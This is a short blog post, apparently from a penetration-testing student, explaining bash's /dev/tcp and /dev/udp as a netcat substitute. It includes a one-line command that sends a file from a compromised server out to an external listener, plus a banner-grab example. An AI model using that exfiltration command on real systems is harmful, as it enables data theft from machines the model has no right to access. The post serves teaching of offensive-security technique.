/dev/tcp

While messing around with netcat the other day for the SANS SEC560 class, Mr Skoudis mentioned a tool I’ve haven’t come across. Strange considering I’ve been mucking around with Linux for a fairly significant amount of time.

I am talking about /dev/tcp

What this nifty little “tool” allows you to do is extend bash programming into the TCP/UDP arena. You no longer have to use netcat for simple TCP/UDP testing scripts, just use /dev/tcp or /dev/udp….

Before going ahead with this you’ll want to make the character devices in /dev if they aren’t there already..

mknod /dev/tcp c 30 36
mknod /dev/udp c 30 39

It’s also worth noting that there is an issue with this on Ubuntu. You’re going to need to recompile Bash from source with the –enable-net-redirections . It’s pretty easy to do so there should be no reason not to.

The basic premise behind /dev/{tcp,udp} is you use it to read or write data from or to a remote server or service using simple bash commands and pipes.

An example would be you’re running a pen-test where you are unable to download, install or run third party applications on the compromised server. You need to get fileX off the server and have a netcat listener running on your external machine. No problem,

cat fileX > /dev/tcp/yourserver/yourport

Awesome (and I am not referring to hot dogs).

What about reading a banner from a remote server ?

cat < /dev/tcp/yourserver/yourport

After that you’re only limited by your imagination and bash scripting skills as to what you can get done with this handy little tool. I’ll leave it to you guys and gals out there to come up with some scripts of your own. Feel free to mail them through to me, I’d be very interested to see how they work.